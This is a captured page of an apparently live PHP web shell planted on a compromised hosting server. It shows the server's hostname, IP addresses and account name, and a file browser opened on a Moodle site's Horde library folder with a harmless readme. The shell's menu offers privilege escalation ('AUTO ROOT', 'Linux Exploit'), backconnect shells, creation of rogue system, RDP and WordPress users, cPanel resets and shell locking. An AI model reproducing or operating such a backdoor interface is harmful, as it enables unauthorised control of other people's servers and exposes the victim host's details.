Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.127.69
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead.aptans /
lib /
horde /
[ HOME SHELL ]
Name
Size
Permission
Action
framework
[ DIR ]
drwxr-xr-x
locale
[ DIR ]
drwxr-xr-x
readme_moodle.txt
1.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme_moodle.txt
Description of import of Horde libraries # Clone the Horde Git Tools repository and install. You will need this for future updates: https://github.com/horde/git-tools # Make sure to follow the #Configuration step mentioned in the URL above. In particular make sure to set the 'git_base' config option in conf.php # Go into the repository cloned above and perform the following: bin/horde-git-tools git clone (Go for a coffee, this will take a while) # Checkout the latest stable version for all repos, currently 5.2: bin/horde-git-tools git checkout FRAMEWORK_5_2 # Copy the following script and store it on /tmp, change it's execute bit(chmod 777), and run it, passing in your path to Horde (the directory you've cloned the repository): /tmp/copyhorde.sh ~/git/base/directory/from/step/2 ==== #!/bin/sh source=$1 target=./lib/horde echo "Copy Horde modules from $source to $target" modules="Crypt_Blowfish Exception Idna Imap_Client Mail Mime Secret Socket_Client Stream Stream_Filter Stream_Wrapper Support Text_Flowed Translation Util" rm -rf $target/locale $target/framework mkdir -p $target/locale $target/framework/Horde for module in $modules do echo "Copying $module" cp -Rf $source/$module/lib/Horde/* $target/framework/Horde locale=$source/$module/locale if [ -d $locale ] then cp -Rf $locale/* $target/locale fi done Local modifications: - lib/Horde/Imap/Client/Exception/ServerResponse.php has been minimally modified for php80 compatibility The fix applied is already upstream, see https://github.com/horde/Imap_Client/pull/13 and it's available in Imap_Client 2.30.4 and up. See MDL-73405 for more details.
Close